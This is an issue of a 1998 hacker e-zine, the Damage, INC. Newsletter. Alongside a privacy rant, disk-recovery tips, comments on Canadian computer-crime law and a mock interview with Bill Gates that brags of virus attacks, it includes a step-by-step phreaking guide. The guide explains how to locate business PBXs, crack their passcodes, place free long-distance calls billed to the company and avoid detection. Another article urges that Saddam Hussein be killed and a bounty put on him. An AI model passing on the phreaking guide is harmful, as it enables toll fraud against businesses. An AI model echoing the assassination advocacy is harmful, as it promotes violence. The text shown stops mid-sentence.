ÛÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛÝ ÞÛÛÛÛÛÛ ÛÛÞÛÛÛÛÛÛÝÛÛÛÛÛÝ ÍÍÍÞÛÛÛ ÛÛÛÍÞÛÛ ÛÛÛÍÞÛÛ ÛÛÝÞÛÝÞÛÛ ÛÛÛÍÞÛÛ ÍÍÍÍ ÛÛÜÜÜ ÍÍÍÍÍÞÛÝÛÛÝ ÞÛÝÞÛÛÝÍÍÍÍÍÍ ÍÍÍÍÛÛÝ ÛÛÛÍÛÛÝÛÛÛÛÍÛÛÝÞÛÛÍÛÛÍÛÛÝÛÛÛÛÍÛÛÝÍßÛÛÝÞÛÝßßßÍÍÍÍÍÍÛÛÞÛÛ ÛÛ ÛÛÝ ÍÍÍÍÍ ÞÛÛÛÛÛÛÛÛÞÛÛÛ ÛÛÛÞÛÛ ÛÛÝÞÛÝÞÛÛÛ ÛÛÛÞÛÛÛÛÛÛÛÝÛÛÛÛÛÛÛ ÛÛÝÞÛÝÛÛÝ ÞÛÝÞÛÛÛÛÛÝÛÛÝ "The name speaks for itself!" ÞÝ Presents the Damage, INC. Newsletter January 1998 Issue #5 "Addictive but not lethal." ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ C O N T E N T S : þ INTRODUCTION - An Introduction to the Damage, INC. Newsletter. þ BIG BROTHER BASHING - A plastic, microchip controlled world. ¯ Search String: {BIG BROTHER} þ BLACKENED'S TIP OF THE MONTH - Data recovery techniques. ¯ Search String: {BLACKENED} þ CONSPIRACIES AND COVERUPS - Bill C-17: The Thought Police are here. ¯ Search String: {COVERUPS} þ CORRUPTION AND GREED - Saddam Hussein: A greedy, defiant dictator. ¯ Search String: {GREED} þ H/P INFORMATION AND NEWS - Phreaking information on PBXs. ¯ Search String: {NEWS} þ INTERVIEWS AND INTERROGATIONS - Another Interrogation of Billy Gates. ¯ Search String: {INTERVIEWS} þ LETTERS TO THE EDITOR - More feedback about the Damage, INC. Newsletter. ¯ Search String: {LETTERS} þ OBJECTIVE OPINIONS - Robert Latimer; victim of cowardly inaction. ¯ Search String: {OPINIONS} þ REPORTS FROM THE FRONT - Ten Tips on how to live in the New World Order. ¯ Search String: {REPORTS} þ SOURCE AND SCRIPTS - Fade to Black trojan source code. ¯ Search String: {SOURCE} þ THOUGHTS, POEMS AND CREATIVE WRITING - "Visions in Fire" essay. ¯ Search String: {WRITING} þ CLOSING COMMENTS - BLACKENED's Humble Closing Comments. ¯ Search String: {CLOSING} ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ INTRODUCTION: The Damage, INC. Newsletter is more addictive than nicotine, heroin and crack but not lethal. However, we're not responsible in any way if you overdose on any information that we present. Damage, INC. intends to give you a massive dose of reality in this issue that'll trip you out... and satisfy your constant craving for the ultimate fix. We're going to shoot you up with the most powerful drug imaginable. It's mind altering, thought provoking and permanent. In essence, it is the perfect drug. To use, open your eyes wide and it'll be transferred directly onto your retinas. Then the drug is injected through them into your brain. The chemicals are absorbed and your mind processes the information that it has received. The reactions vary and the results are always different from user to user. In case anyone doesn't know what I'm referring to, it's called reading and comprehending what is written. The drug is ideas, opinions and any information that makes you think. As in, reading something that is interesting and thinking about what you've read can be very addictive, expands your mind and is relaxing. It can also be rewarding to learn about new techniques, methods and different points of view. Reading a publication like the Damage, INC. Newsletter can show you perspectives that you had not previously considered. It should be read and used as a source of facts, thoughts etc. that can vastly improve a readers basis for various subjects and topics. Damage, INC. believes that by publishing and releasing this newsletter which informs, educates, promotes alternative learning and thinking...that inevitably those that loyally read it are destined to learn and grow. I am by no means speaking exclusively about the articles that are h/p related either. For example, the Big Brother Bashing section is just as important since it contains valuable information that's general interest. Also, many of our articles are often about topics that the mass media chooses to ignore or refuses to openly discuss. They limit themselves and censor everything. They hide from controversy and fear truth. That is the reason that this forum was established. Damage, INC. wanted to create a way of expressing opinions etc. in an open manner to share thoughts and ideas with others. We're always honest with our readers and expect people to disagree, debate and think about what we write. All we can ask is that you at least consider and contemplate what we've written. In fact, you are encouraged to evaluate and ponder our words. It won't kill you to do that. Damage, INC. is aware of the fact that people will always have differing opinions and we accept that. We are giving you more credit than the mass media ever will. To them, everyone is just a zombie with money that they can exploit in order to profit. They don't perceive us to be intelligent individuals, but rather a group of naive, gullible idiots that they can use and influence at will. They look at citizens as being potential consumers with expendable income. Always remember, ignorance is deadly. We need more enlightened, open minded people that are willing to combat the ignorant that exist in "society". The greatest weapon that you can possess is being an informed person that's willing to go against the grain. BIG BROTHER BASHING - {BIG BROTHER} A plastic, microchip controlled world: The world is made of plastic and microchips are everywhere. Instead of being called Earth, it should be renamed to "The Plastic Planet". Why anyone would refer to this as the "blue planet" is beyond me. It's more like the microchip controlled rock that's spiralling aimlessly in orbit out of control. That is, we are not the ones in control. In fact, plastic cards are the norm and tiny microchips are in everything now... which makes Big Brother's job of controlling our lives much easier. Soon Big Brother will have total control over us. Any information that they desire will be readily available to them. Indeed, it'll be at their proverbial fingertips. They'll be able to access literally any data they want instantly. "How is that possible?" I'll explain. Nothing is safe anymore. "Why not?" The advancements in technology have allowed the impossible to become common. Gathering data on individuals was once a very difficult task to perform. That is no longer the case. "What is wrong with plastic cards and microchips?" I will attempt to answer all of these questions so that you can form your own opinions about Big Brother from an informed standpoint. Microchips are now smaller and faster than ever before. We are entering a new age. Some refer to it as being a "Brave New World" (which is a reference to a classic book by the way). Others fear that Big Brother will abuse this new technology. Obviously, Big Brother is already embracing and exploiting the "Digital Revolution". Recently, I read an article on TIME Magazine's Man of the Year: Andrew Grove. In case you are wondering, he's the chairman and CEO of Intel. In 1947 the transistor was invented by two Bell Labs scientists in New Jersey. Today, a single Intel Pentium II processor chip has 7.5 million transistors on it and is able to make 588 million calculations a second. Intel and the rest of Silicon Valley aren't just producing microchips that are to be used in desktop computers. In fact, much of what they sell has nothing to do with what would be deemed a computer at all. Microchips are now commonly used in popular convenience appliances like coffee makers, toasters, rice cookers, televisions and ovens. Those are just some examples. It has been reported that the technology for someone to control their TV using their brain now exists. The ubiquitous chip is also in most new cars, cameras, smart cards etc. and is even in some pairs of running shoes and jewelry. According to Andrew Grove, when asked about the role of technology "Technology happens," "It's not good, it's not bad. Is steel good or bad?" Sure, Grove is a great entrepreneur. Some might even call him a visionary for building Intel into a company that is worth an estimated $115 billion with $5.1 billion in annual profits. However, is he not responsible... at least to a certain extent for how the technology that Intel creates is used? I am by no means trying to condemn him for being financially successful. I honestly don't care how wealthy Grove (or Bill Gates for that matter) is. I do think that they should be held responsible for the products that they produce though. Surely, Andrew Grove, a man that lived through the Nazi and SS regime would know how technology such as the small, fast microchips that Intel creates can be used by Big Brother during this era. Afterall, he was voted Man of the Year for his brilliance, leadership and co-founding a huge company that makes nearly 90% of the planet's PC microprocessors. He contributed to building Intel into an economic power- house. That can't be disputed. Yet, I can't help but wonder about the future of the microchip and how it'll be used against us. Already, they can put a small chip into pairs of shoes that can store and exchange data. They can put a microchip into the stomachs of animals like cows. Logic dictates that humans will soon have microchips implanted into their bodies. Big Brother is smiling and laughing. The collection of data is being made much easier for them with the accepted use of plastic smart cards and microchips. Technology isn't bad but it can be used for malicious purposes like the invasion of someone's privacy. Personally, I want to be able to purchase items without Big Brother having a record of every transaction I make. I don't want them to have access to all of my financial data, medical data, be able to track my movements, or have everything they want at their fingertips. Citizens should have the right to privacy and freedom. I won't allow Big Brother to implant a microchip in me. Just as, I won't use any smart cards. They aren't safe since they contain microchips, can store and transfer data, and make it easy for Big Brother to gain information. I suggest you think about the future, how plastic smart cards and microchips will be used. Do you want Big Brother to have total control over you? It is possible. Hoping that it won't become a reality or ignoring it won't make it go away. That is the reason that nothing is safe, secure or private anymore. Big Brother has plastic cards and silicon microchips to thank for their greatest wish becoming possible. Cameras are everywhere. They're mounted outside on buildings, street corners, at intersections on traffic lights, above ATM machines etc. They are also inside of many buildings (retail and commercial stores, offices, airports, most banks etc.) Some cameras are well hidden and are so minuscule that they're almost undetectable. Eventually, you won't be able to walk in an isolated, unpopulated rural area without knowing or feeling that you're being watched. Everything that you do will be recorded. The inside of an average Las Vegas casino, with its hundreds of security cameras scoping out every square inch of the establishment... panning and zooming in on gamblers could easily become the model used by Big Brother. Afterall, why wouldn't Big Brother study the way that casinos monitor people and then copy them? It would be extremely cost effective for them to employ the same system(s) used by casinos elsewhere. Of course, Big Brother would use them to track and monitor the actions of innocent citizens for purposes of control and power. If nothing else, it is definitely something that you should think about. Never assume that you have privacy or take it for granted. Written by BLACKENED ú Damage, INC. (C)opyright 1998. BLACKENED'S TIP OF THE MONTH - {BLACKENED} Data recovery techniques: Disclaimer: If you use any of these data recovery techniques, and the result is that you lose data, Damage, INC. isn't responsible. They're just tips that should work if they're properly applied. However, they won't remedy every catastrophic situation. They should be followed precisely and only used when absolutely necessary. For example, you accidentally executed a trojan and want to attempt to recover some of the crucial, important data. Basically, you should only use the methods below as a last resort. ;) Now that I've established when to use these data recovery techniques, I will now discuss certain possible situations and problems. Many newbies have asked me how to "fix their hard drive". First, I ask them what problems they have encountered. Usually, they reply that their hard drive "won't boot anymore". Obviously, I tell them to try booting up their system from a bootable floppy, switch to C:, execute FDISK /MBR (replaces the Master Boot Record), remove the floppy and then reboot. Of course, that only repairs one problem and there can be many. If the user ran a trojan, they will more than likely have several other problems with their hard drives. The Media Descriptor Byte can be invalid, the Partition Tables, FAT Tables etc. could have been altered etc. It's possible that there's been some damage done and data loss. However, you might be able to recover everything. Some people make the mistake of loading FDISK and using FORMAT C: immediately. They assume that because they get the DOS error message "Invalid drive specification" when they try to change to C: and can't access the drive, that it means drive C: is done in. That's simply not true. There's always a chance for data recovery. ;) If you receive that error message, execute FDISK on a floppy disk. (Hopefully you have a bootable MS-DOS backup disk. If you don't, I suggest you make one). If there are NON-DOS partitions that the trojan created, delete them. If the partition table was nuked, create a new one that is the same size as the previous one that existed. (ie, if you have a 1 gig hard drive and it wasn't partitioned into two drive letters, then create a new 1 gig partition). FDISK doesn't "destroy" any data. Ignore the warning message that says all data on the current partition will be destroyed. Don't worry, many people are under that misconception and fear FDISK. Then reboot the system. If there are still problems, then it's probably due to the FAT tables being destroyed. It's very common for trojans to overwrite and corrupt the FAT tables. Basically, they're an easy target. In case you are wondering, there are two FAT tables (File Allocation Tables) per hard drive. The second FAT is an exact duplicate copy of the first. In order to repair them, you'll need to use Norton Disk Doctor (or a similar product). That is, unless you know how to manually repair your FAT Tables etc. with a disk editor. ;) If you do, use Norton DiskEdit or the disk editor of your choice. At any rate, that's a good way to check out the damage that's been done... since you can view the data that has been overwritten etc. before you decide to do anything. Norton Disk Doctor might report many errors with your hard drive(s). It will report any problems that it finds and prompt you to fix any areas that it determines to be invalid. This is the final step in this data recovery technique. There is no turning back. Do not allow Norton Disk Doctor to repair any Partition or Boot Sector errors it may encounter because FDISK has corrected them (if you followed my instructions properly). Allow Norton Disk Doctor to repair errors to the Media Descriptor Byte, FAT Tables, files etc. Once Norton Disk Doctor has completed repairs, you may have recovered all of the data... or you may have to look for your backup disks. It all depends on what type of damage the trojan did. Damage, INC. has found that the best results are obtained from this technique if the trojan hasn't damaged the hard drive's directory structure. Obviously, it makes it much easier for Norton Disk Doctor to recover the FAT Tables etc. Good luck, and be sure to make backups of all of your critical data. Written by BLACKENED ú Damage, INC. (C)opyright 1998. CONSPIRACIES AND COVERUPS - {COVERUPS} Bill C-17: The Thought Police are here. Disclaimer: I was not able to obtain an up-to-date copy of the Criminal Code of Canada. I found an old copy on the Electronic Frontier Foundation of Canada's web site. I manually added the Bill C-17 (35th session) amendments by referring to the copy I got from the Government of Canada web site. I also removed french definitions in section 342.1 since they are useless. If there is any misinformation, the above sources are responsible for it. I will show you sections 342.1 and 342.2 of the Criminal Code. Section 342.1 deals with "illegal" computer usage. The altered section 342.1 is listed below. Bill C-17 additions will be denoted with the prefix [C-17]. Unauthorized use of a computer 342.1 (1) Every one who, fraudulently and without colour of right, (a) obtains, directly or indirectly, any computer service, In one sense, this "anti-hacking" law is a fucking joke. However, since it is so intentionally vague, and the Code's definition of `computer service' is so ambiguous, it is more than enough to send you to the cop shop and beyond. (b) by means of an electro-magnetic, acoustic, mechanical or other device, intercepts or causes to be intercepted, directly or indirectly, any function of a computer system This section is extremely vague and unclear. However, I'll attempt to explain it according to my own understanding of what is written. It's illegal to directly or indirectly obtain access to any computer service (ISPs etc.) by using any "device". By device, it sounds like they are referring to electro- magnetic card readers, using a fake or stolen/fraudulent credit card (carding), uses an acoustic (listening device/bugs etc.) to get accounts or any other device that enables them to intercept any information relating to the function of a computer system. Basically, you can't do shit without it being an illegal act. As for the mechanical, any boxes, taps, etc. are illegal to use directly or indirectly. Even if you aren't intentionally trying to do that, it is still considered to be illegal according to the above section 342.1(b). (c) uses or causes to be used, directly or indirectly, a computer system with intent to commit an offence under paragraph (a) or (b) or an offence under section 430 in relation to data or a computer system, or If anyone intends to gain illegal access to a computer system, they can get burned for it. This section is the bane of wannabe hackers that don't know what the fuck they are doing. They don't gain access to a computer system, but can potentially face the same penalty that a real hacker would. Section 430 deals with damaging computer data to make it unintelligible, in part or fully. Haha. Section 430 was once typed into an auto-message by a 519 sysop in an extremely pathetic attempt to intimidate Damage, INC. All it did was make us shake our heads... and that intimidated him. ;-) [C-17] (d) uses, possesses, traffics in or permits another person to have access to a computer password that would enable a person to commit an offence under paragraph (a), (b) or (c) Yes, you read this correctly... it is a criminal offence to possess a password that could be used to enable a person to commit an offence listed above. Hell, wouldn't that include every Internet user and BBSer? Fuck the laws created by Canada's "Inner Party." You can be branded a criminal by having the *means* to commit an offense. It is because of these laws that the encryption of sensitive data such as passwords is extremely important...if not critical. If two friends share a computer password it makes them both "criminals." The first friend who owns the account would be busted under 321.1(d), and the other friend that uses the account is charged under 321.1(a). Both are subject to the same potential penalty listed below. is guilty of an indictable offence and liable to imprisonment for a term not exceeding ten years, or is guilty of an offence punishable on summary conviction. If you were convicted of anything above, you could be put in jail for ten years if the judge wanted to "make an example out of you" in order to "deter others." Below are the definitions to the various terms in section 342.1. Unfortunately, I don't have the space to criticize each term individually. It isn't a surprise to me that these definitions are needlessly cryptic. Definitions (2) In this section, [C-17] "computer password" means any data by which a computer service or computer system is capable of being obtained or used; "computer program" means data representing instructions or statements that, when executed in a computer system, causes the computer system to perform a function; "computer service" includes data processing and the storage or retrieval of data; "computer system" means a device that, or a group of interconnected or related devices one or more of which, (a) contains computer programs or other data, and (b) pursuant to computer programs, (i) performs logic and control, and (ii) may perform any other function; "data" means representations of information or of concepts that are being prepared or have been prepared in a form suitable for use in a computer system; "electro-magnetic, acoustic, mechanical or other device" means any device or apparatus that is used or is capable of being used to intercept any function of a computer system, but does not include a hearing aid used to correct subnormal hearing of the user to not better than normal hearing; "function" includes logic, control, arithmetic, deletion, storage and retrieval and communication or telecommunication to, from or within a computer system; "intercept" includes listen to or record a function of a computer system, or acquire the substance, meaning or purport thereof. [C-17] "traffic" means, in respect of a computer password, to sell, export from or import into Canada, distribute or deal with in any other way. Section 342.2 is listed below. This section is another Bill C-17 addition. 342.2 (1) Every person who, without lawful justification or excuse, makes, possesses, sells, offers for sale or distributes any instrument or device or any component thereof, the design of which renders it primarily useful for committing an offence under section 342.1, under circumstances that give rise to a reasonable inference that the instrument, device or component has been used or is or was intended to be used to commit an offence contrary to that section, (a) is guilty of an indictable offence and liable to imprisonment for a term not exceeding two years; or (b) is guilty of an offence punishable on summary conviction. This is yet another disturbing section of the Criminal Code. It is a conspiracy to make it a criminal act to possess or share knowledge that could be used to commit an offense under 342.1. The only way a person could get off is to attempt to prove that a person charged under 342.1 didn't get the means to perform the "criminal act" from them. Also, what is a "instrument, device or component?" under this section? A h/p/a/c/v/t BBS? The Damage, INC. Newsletter? A conversation intercepted by Big Brother and the Thought Police? It all depends on a judge's interpretation of 342.2. Did you notice the words "without lawful justification or excuse" at the beginning of section 342.2? My interpretation of that phrase is this is a loophole for the police. They can "make, possess, sell, offer for sale or distribute any instrument or device" in order to access a suspect's computer system, etc. Section 342.2(2) (not listed) pertains to the forfeiture of "instruments or devices" that were used under subsection (1). In the name of "Her Majesty," the police can use a convict's equipment, or have an auction to finance their next staff party. Of course that is in addition to the two year prison sentence. This concludes our look at Criminal Code section 342. It is much more than busting a hacker that gets caught. It is a conspiracy to imprison all of us "dissidents" that have the means and knowledge to commit an offense under 342.1 or 342.2. Busting a 16 year-old kid under section 342 is one thing, but they can't stop intelligent, experienced hackers. That is the fact that they are attempting to coverup in a lame attempt to make computer service providers (like ISPs) feel "secure." Intimidation doesn't work Big Brother! ;-) Written by Shatazar ú Damage, INC. (C)opyright 1998. CORRUPTION AND GREED - {GREED} Saddam Hussein: A greedy, defiant dictator: The Gulf War ended many years ago, yet Saddam Hussein is still in power. He not only controls Iraq and its people, he's still considered to be a powerful, influential leader in the Middle East. Saddam Hussein continues to make threats against the United States and is as defiant as ever. Hussein won't comply with the U.N. resolutions and is blocking the weapons inspection teams. Some are calling for an assassination of Hussein. They want Clinton to issue the order to kill Saddam. Others are advising that a military strike is needed. A final showdown seems inevitable. Obviously, Hussein is an enemy and a threat to the world that cannot be ignored by other nations. He still has biological and chemical weapons hidden in Iraq. His willingness to use them can't be questioned, since he used mustard gas against his own people in the past. We also know that he has Anthrax (an estimated 400 kg, one gram can kill millions), vast quantities of VX nerve gas, Botulinum (a potent toxin that paralyzes the victim) and Aflatoxin. Hussein has the ability to produce more Anthrax etc. He's not stockpiling chemical and biological weapons for nothing. Hussein intends to unleash them against his enemies. The most likely scenario would be for him to target a U.S. city and use terrorists to deliver the weapons. In other words, he wouldn't just launch a SCUD missile or attack through any obvious means. Saddam Hussein knows that he doesn't have the military power to defend against or defeat the U.S. with conventional weapons, so he's developed other methods. Personally, I don't think that Clinton is strong enough to follow through and take out Hussein's ability to wage war. He has enough problems of his own with his presidency. I don't want this article to be all about weapons, the possibility of air strikes and military action against Iraq etc. though. The main reason that I wanted to write this article is to describe Hussein's greed, corruptness and defiance. The mass media just isn't doing a good enough job of exposing Saddam Hussein so that people can see his true colors. Hussein has been reported to own at least 17 different palaces in Iraq. He hoards the profits that are made from exporting oil (Iraq's only real natural resource). His people have been hurt more by him than by the sanctions against Iraq. The Iraqi people were poor before the Gulf War, and they'll remain that way as long as their corrupt leader Saddam Hussein is in power. Of course, the Iraqi's fear Hussein and are forced to participate in public rallies of support, as well as being human shields and protect him. Hussein is an extremely paranoid dictator that moves constantly from place to place, uses body doubles, uses chemical analyzers on his food before eating, has killed many close associates, brother in-laws and many others. He uses fear to make sure nobody will try to assassinate him. Hussein also has his own security force. Several coup attempts have been made since 1991, but all of them have been stopped. Basically, Hussein will do anything in order to stay in power. He'll kill anyone that opposes him. He's willing to watch his own people starve while he is driven around in expensive Mercedes cars from palace to palace. Saddam is a very greedy man that has spent billions of dollars on himself. He profits from everything that is sold in Iraq. Iraq's Deputy Prime Minister Tariq Aziz (Hussein's personal media spokesman would be a more suitable title) was quoted as saying "After seven years of sanctions, you get desperate...another wave of missiles makes no difference to the Iraqi people or the Iraqi government." That's Saddam Hussein's defiance speaking, since Aziz is just one of his puppets. Hussein doesn't give a fuck if his people are bombed. He'll be hiding in one of his concrete bunkers, safe and sound with a smile on his face. Baghdad is plastered with posters of Saddam Hussein. His use of propaganda is legendary and should be the classic model for all dictators. "BUSH IS CRIMINAL" is written under a mosaic of former President Bush on the marble floor of the al-Rasheed Hotel in Baghdad. Inside is a sign that reads "DOWN DOWN AMERICA. USA COUNTRY OF TERRORISM". Hussein loves slogans that bash the United States, but then why does he promote terrorism? Why does he use Iraqis as human shields? Why does he force them to chant and praise him? Why can't he allow free elections? It's because he is greedy, corrupt and afraid. There can be no other answer. He's driving his country towards another war, in which Iraq cannot win. He knows that, but he's willing to sacrifice thousands of lives for nothing. Saddam Hussein is a defiant, insane dictator that will stop at nothing to prove himself to the world. He's been on a huge power trip for years now. The only way to stop him is to kill him. That is what should be done. That is what must be done before he's allowed to use his weapons of mass destruction. He's already managed to get support from several countries (France, Russia, China), so it's up to the United States to take him out. In my opinion, a large bounty should be offered for Hussein's head. Money talks and greed can be used to eliminate greed for the common good. Now is the time to end his reign of greed and corruption. It is time to send a message to the world that defiant dictatorships won't be tolerated anymore. Written by Blackie Lawless ú Damage, INC. (C)opyright 1998. H/P INFORMATION AND NEWS - {NEWS} Phreaking information on PBXs: This article will discuss the basics of PBXs and is intended for newbie phreaks to read and learn from. PBX is an acronym for Private Branch eXchange. From this point on, I will refer to them as PBXs for simplicity. They are quite common in most area codes. Obviously, some exchanges will have more PBXs than others since they contain a lot of businesses that use them. Most large (and some small) businesses use them because it eliminates the need for many incoming phone lines. The PBX has extensions that can be located in various offices throughout a building. Have you ever worked or been in an office with phones that have numbered buttons? Some are lit up and others aren't in use. Usually, you have to press one of the extension buttons, press 9 and then dial out. Most PBXs have passcodes that are 4+ digits. They can be hacked by ToneLoc, another code hacker or manually. They aren't the same as extenders. I'm not even going to discuss 1-800 extenders, 950s or any LD carriers in this article. However, you can use a PBX to call ld which is what they are most commonly used for. Unlike 1-800 extenders, many PBXs don't have ANI (Automatic Number Identification) so they're relatively safe to hack and use if you know what you are doing. First, phreaking safely involves more than just downloading a copy of ToneLoc and scanning 1-800-XXX-XXXX from home like a stupid lamer. :) You should start off by finding some local PBXs. This doesn't require a lot of knowledge to do. You could do some social engineering if you don't want to spend hours scanning for tones. For example, many stores like WAL-MART etc. have a PBX system. They're also great places to use for scanning 1-800s, but I'll save that for another article though. Anyways, if you're standing alone by a phone in WAL-MART take a good look at it. If the phone number is written on the card, write it down. If the extension buttons are labelled, write those numbers down. Try dialing out. Usually that requires dialing either a 9, * or # before the number you want to call. It's how you get a dial tone. Some PBXs need the passcode before you can try to dial out. Others need a valid passcode entered after you dial 9, * or #. PBXs aren't all the same. There are many different types that you will need to learn about. Just as, you'll have to determine the number of digits the passcode is before you attempt to hack it. The best way to do that is to experiment with the PBX by hand dialing it from a phone. If it's a 1-800 PBX, you can use a pay phone. If it's a local PBX, just use a phone at a store or dial from home through a diverter. Make sure you're using a good diverter by checking it with an ANI first. You can also call the extensions of PBXs. For example, if you are in WAL-MART and have access to a phone you can push a button or dial the extension number. The ways in which to do that vary. Try dialing "100" or "#100". Or remotely, dial ACN+XXX-XXXX then "100" or whatever extension you want. The first is how the employees call from desk to desk. The second is how you can call someone directly at their desk if you know their extension number. It's fairly simple. I'm sure you've seen commercials on TV that give a 1-800 number and an extension to talk to a sales rep or operator number. That's just an example. 1-800 PBXs, Voice Message Systems etc. are very prevalent these days with companies and are easy to find on packages, in magazines etc. Businesses use PBXs to save money and to make things more convenient and efficient for their employees. For example, if Joe Lamer works at a company and he needs to make long distance business calls from home at night... he can dial out through the company's PBX and the ld will be billed to the company. That way, he doesn't have to pay for making business calls from home, use a calling card, or go through the hassle of getting his phone expenses paid for each month. (ie, the company doesn't have to go through his phone bill every month and repay him for the ld business calls he's made). Basically, it makes things simpler. This not only benefits Joe Lamer, but also us phreaks. We can find the PBX, hack it, and use it to call ld. :) If you do find and hack a local PBX, don't abuse it by making hundreds of ld calls. Even if they don't have ANI and don't trace you, it is best to use the PBX sparingly. That way, you won't get caught and it will last (won't change, nobody will notice, they won't get ANI etc.) In other words, don't make 1,000 ld calls per month using a PBX to different area codes all over the world. Make a few calls through the PBX per month and it won't get noticed. That way, you won't be detected and will be able to call ld for free using it. There are also some other things that you should keep in mind. For example, use ToneLoc cautiously when scanning and hacking PBXs. If you're trying to hack a 5 digit passcode, don't allow ToneLoc to make 1,000 attempts in one session/night. Don't scan or hack sequentially either. Don't be paranoid, just eliminate any obvious methods and use common sense when hacking or phreaking. If you're desperate and want to do something like scan 1-800s from home, hand dial using a phone. Pick random numbers. Look for different tones, ringbacks, dial tones or anything that gives a unique result. You might find a few VMBs, ANIs, extenders etc. Write down all of the numbers you dialed and work on hacking the useful ones later. Alter the amount of time between your dials and limit yourself to calling ten 1-800s or so in a night. That makes it less suspicious. Don't use any patterns while dialing that can be picked up. Use as much randomization as possible. If you try to scan too many 1-800s at a time, you'll get busted eventually. Avoid calling the 1-800s again that are of no use to you. It's also a good idea to divide the numbers you want to scan with another phreak that you trust and work together. That way, you don't have to scan for quite as long, can get just as many codes and it's safer. Extenders usually tell you what to do like "Enter your passcode", as do some diverters. Some are vague and don't give you as many prompts and instructions. Use your imagination, logic and be creative. If you already have some phreaking experience, try using what has worked for you in the past in order to hack them. Listen to the tones and beeps carefully. They can give you hints as to what is required (passcode, ACN, the order, how long the passcode is). Usually you're given a few seconds more than required to enter a passcode. So, that's how you can determine the amount of digits. Many extenders will give an error message "That passcode is invalid." PBXs can vary since there's more than one type. That makes it difficult to explain everything in one short article. I won't discuss access levels, admin, digital switches etc. in this article, nor will I give information about specific PBX systems. There are some major differences between extenders and PBXs. Many extenders are 1-800s and have ANI, or can only call certain area codes or exchanges. That can be limiting if the extender only reaches your own area code or an exchange in it. Most PBXs can usually reach any area code. They can be used to call outside of your area code, to different countries, or the entire world. Some have call block enabled to prevent 1-900 numbers etc. from being dialed, but other than that PBXs are generally far reaching. :) Once you have a PBX, have a valid passcode and are ready to use it there are a few precautions that you should take. If your codes are stored in a text file, encrypt it. Don't keep pieces of paper containing codes lying around. Also, don't post codes in public message bases on boards, sell them, give them out to everyone you know to use etc. That is, unless you want the code to stop working or even better, get busted by the cops. More than likely, I will write about PBXs again in a future issue of the Damage, INC. Newsletter. There is just too much information to cover in a single article...and I don't want to overwhelm the newbies. Hehe. In summary, this should give you the basics of PBXs and get you started. I'd like to thank BLACKENED for suggesting that I write this article and for giving me some ideas and inspiration. Perhaps I will share some of my phreaking experiences with readers too. I also want to write about VMBs etc. (some have a PBX). If you have any suggestions, leave me Email on AJFA. If it relates to h/p, then I'll probably decide to use it. Then everyone that wants to know that information and reads my article will benefit. Written by Blackie Lawless ú Damage, INC. (C)opyright 1998. INTERVIEWS AND INTERROGATIONS - {INTERVIEWS} Another Interrogation of Billy Gates: The saga continues. = BLACKENED = Billy Gates = Blackie Lawless = Receptionist = Shatazar = Micro$oft Lackey - (Dialing 1-800-MS-SUCKS then #LAME for Billy Gates' extension). - Hello? This is Microsoft HQ... Miss Nicholas speaking. Please state your business and I'll try to assist you. - This is Damage, INC. I demand to speak with Billy Gates immediately. He knows who we are, so don't try to push the security panic button or stonewall us... like you usually do. - Yes sir. I'll put you through to Mr. Gates immediately. - Hahaha... gotta like the fear in her voice. - Billy Gates speaking, What do you want me to do today? - This is Damage, INC. and we want to cheapshot you... today and everyday. Hahaha. How'd you like reading our last interrogation of you? - Oh, it's you Mr. Blackened. I thought my security would stop you from disturbing me from my plans and my "vision" to take over the world. I didn't enjoy being interrogated and humiliated. Unfortunately, my multi-million dollar security force couldn't track you guys down so I could destroy you all. - Destroy Damage, INC.? Hahaha! Billy, you must be fucking dreaming again. at Gates. Your "security" (said very sarcastically) is a joke. I'm calling through your 1-800-MS-SUCKS PBX. You don't even have an ANI. If you try to trace my call... you won't be successful since I'm calling through a 1-800-MS-BLOWS diverter anyways. ;) Your vision is to fill your pockets with as many zombie dollars as possible. That's the extent of your lame plan to take over the world. - This is Blackie Lawless.. Billy boy. Haha. You probably didn't expect Damage, INC. to call you using teleconferencing. I've got a few questions for "your lameness". How do you like the court's decision to stop you from including Micro$hit Explorer with Windoze 95/98? What are you going to do now Billy? - Ah, er, uhm, well Mr. Lawless, you don't have a very nice attitude, and you don't mince words... a quality in which I don't share in. As for the Explorer, I thought I could fight the US Government and I assumed they would back down. However, when they started fining me and taking away precious Microsoft Monies, it ate me alive. I decided to revert to my cowardly, conniving ways and beat a hasty retreat. I'll hide in the shadows, and will try to sneak Explorer in a few years down the road when the zombies aren't looking. - Hahaha. Damage, INC. will be around to stop you though. Just as, all of your neighbours know that Micro$hit sucks... now that it's spray painted on your precious lawn at your Seattle "retreat". We'll do anything in our power to make people aware of your schemes and scams... and take money away from you at every opportunity. By the way, your little Micro$oft Network is currently down. You better get your "internet experts" working on the servers. Haha. They'll soon find out that there's a nice, stealthful virus that is infecting them... courtesy of Damage, INC. ;) - Haha. Yeah, and it's too bad you don't like my attitude Billy. That's really too fucking bad. It's also a shame that most of Micro$oft's software in Chicago has been infected as well. ;) - Yeah Gates, you pathetic weasel. This is Shatazar of Damage, INC. Your totally outclassed and outnumbered by Damage, INC. If you are afraid of losing $1 million per day, you'll be really done in when Damage, INC. destroys you. - What? You bad guys vandalized my artificial cybergrass lawn with computer controlled growth mechanisms? You meanies! And the Microsoft Network is damaged? That is nothing new. My experts lack the tremendous vision that I have. Plus I don't have the money to invest in better servers, so they'll have to try to recover from your attack. I still have some faith in my well paid lackeys. As for the people in Chicago getting infected software, that doesn't mean anything. Windows 95 is preprogrammed with a life cycle, so that my zombie customers will by new version after new version without question. They keep giving me money for such tremendously graphical software. As for my money, I need it so I couldn't afford the fine. I'll have to take my chances against Damage, INC. I can always buy my way out. Tehehe. - Listen you fucking geek, I told you the last time that you ain't seen nothin' yet. I meant exactly what I said. You won't recover from our attacks. Your paid lackies are no match for Damage, INC. Winblows 95 is just and overrated, inefficient, hard drive hogging, memory wasting piece of shit... that crashes daily. It's programmed in Visual Basic for fuck sakes. Take your chances? What the 